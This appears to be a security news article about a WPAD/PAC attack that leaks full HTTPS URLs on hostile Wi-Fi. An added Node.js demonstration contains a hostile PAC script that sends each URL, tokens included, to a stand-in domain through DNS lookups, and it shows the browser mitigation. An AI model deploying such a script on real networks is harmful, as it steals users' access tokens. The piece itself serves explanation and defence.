HTTPS was widely assumed to keep a network observer from learning which pages a user visits. A new attack defeats that protection on Windows, Linux and Mac systems, and it can be carried out by whoever controls the network, for example a Wi-Fi hotspot operator, Ars Technica reports.
HTTPS encryption hides the full address of each page a user visits (the path and query string, not just the host name) from data snoopers and other malicious users on the network. The new attack breaks that guarantee on any network the attacker controls, and it is most dangerous on public Wi-Fi hotspots, where users rely on that protection most.
The attack abuses Web Proxy Autodiscovery (WPAD), a feature by which a browser automatically locates its proxy configuration on the local network, via DHCP or DNS. An attacker who answers that lookup can serve a proxy auto-config (PAC) script of their own, and the browser then hands every request's full URL, including the path and query string of HTTPS URLs, to that attacker-controlled script, which can record or leak it. The attacker can then see every page the user visits. The technique reportedly works in all major browsers on every operating system. It is scheduled to be unveiled at the Black Hat security conference in Las Vegas next week.
How serious the attack is remains under discussion. Although it exposes only the full URLs of visited pages, the consequences of that are grave, because many websites and web services use the URL itself to authenticate a user. Dropbox, for example, embeds a security token in shared-link URLs, and some password-reset mechanisms use the same technique: whoever holds the link holds the access. So even though the attacker obtains only the full URL, he or she can misuse it to great effect.
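The following is an added example, not code from the article or from the researchers it describes. It simulates, in Node.js, the PAC environment a browser provides to a WPAD-served script: `dnsResolve()` is stubbed to record the names a script asks for instead of doing real DNS, the "attacker" PAC script and the `leak.example` domain are constructed for illustration, and the token-carrying URL is invented. It shows both points made above: that the PAC script receives the full HTTPS URL (path, query and any token in it) and can exfiltrate it through DNS lookups, and how the mitigation later adopted by major browsers, passing only scheme and host of https:// URLs to the script, closes that channel.

```javascript
// Simulated PAC environment (constructed for this example). A browser calls
// FindProxyForURL(url, host) for every request and exposes helpers such as
// dnsResolve(). Here dnsResolve() only records the names a script tries to
// resolve; on a hostile network those lookups reach the attacker's DNS server.
const dnsLog = [];
function dnsResolve(hostname) {
  dnsLog.push(hostname);
  return "203.0.113.10"; // constructed reply from the documentation address range
}

// Attacker-supplied PAC script (constructed). It hex-encodes the full URL into
// DNS labels under a domain the attacker serves, so every browser request leaks
// its URL in a DNS query, then returns DIRECT so browsing keeps working.
function maliciousFindProxyForURL(url, host) {
  const encoded = Buffer.from(url).toString("hex");
  // DNS labels are limited to 63 octets; split the hex into label-sized chunks.
  const labels = encoded.match(/.{1,60}/g) || [];
  dnsResolve(labels.join(".") + ".leak.example");
  return "DIRECT";
}

// Mitigation: for https:// URLs, give the PAC script only scheme and host, so a
// token in the path or query never reaches attacker-controlled code.
function stripHttpsPath(url) {
  const u = new URL(url);
  if (u.protocol === "https:") return `${u.protocol}//${u.host}/`;
  return url;
}

// Drives a PAC script the way a browser would, with or without the mitigation.
function runPac(pac, url, mitigate) {
  const host = new URL(url).hostname;
  const seen = mitigate ? stripHttpsPath(url) : url;
  return pac(seen, host);
}

// What the attacker's DNS server recovers from one leaked query name.
function decodeLeakedUrl(queryName) {
  const hex = queryName.replace(/\.leak\.example$/, "").split(".").join("");
  return Buffer.from(hex, "hex").toString();
}

// Constructed URL carrying a bearer-style token in its query string (not a real service).
const SECRET_URL = "https://files.example.com/reset?token=9f3a7c2e";

// Runs the same request through the hostile PAC script twice, once as a browser
// without the mitigation would and once with it, and returns what leaked each time.
function demo() {
  dnsLog.length = 0;
  runPac(maliciousFindProxyForURL, SECRET_URL, false);
  const leakedWithoutMitigation = decodeLeakedUrl(dnsLog[0]);
  dnsLog.length = 0;
  runPac(maliciousFindProxyForURL, SECRET_URL, true);
  const leakedWithMitigation = decodeLeakedUrl(dnsLog[0]);
  return { leakedWithoutMitigation, leakedWithMitigation };
}

console.log(demo());
```

Without the mitigation the decoded DNS query contains the whole URL, token included; with it, only `https://files.example.com/` reaches the script. DNS is not the only exfiltration channel: a PAC script can also return `PROXY attacker:8080` for selected URLs and read them off the proxy, which is why stripping the path before the script runs, rather than restricting `dnsResolve()`, is the fix that matters. Disabling WPAD on devices used on untrusted networks removes the exposure entirely.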
Itzik Kotler, co-founder of SafeBreach, is one of the scheduled speakers at the conference in Las Vegas next week and addressed this issue in an email. He said that this hack is of great concern, for people all over the world rely on HTTPS encryption in places where their LAN/Wi-Fi cannot be trusted. According to him, people using non-trusted networks are under threat when WPAD is enabled.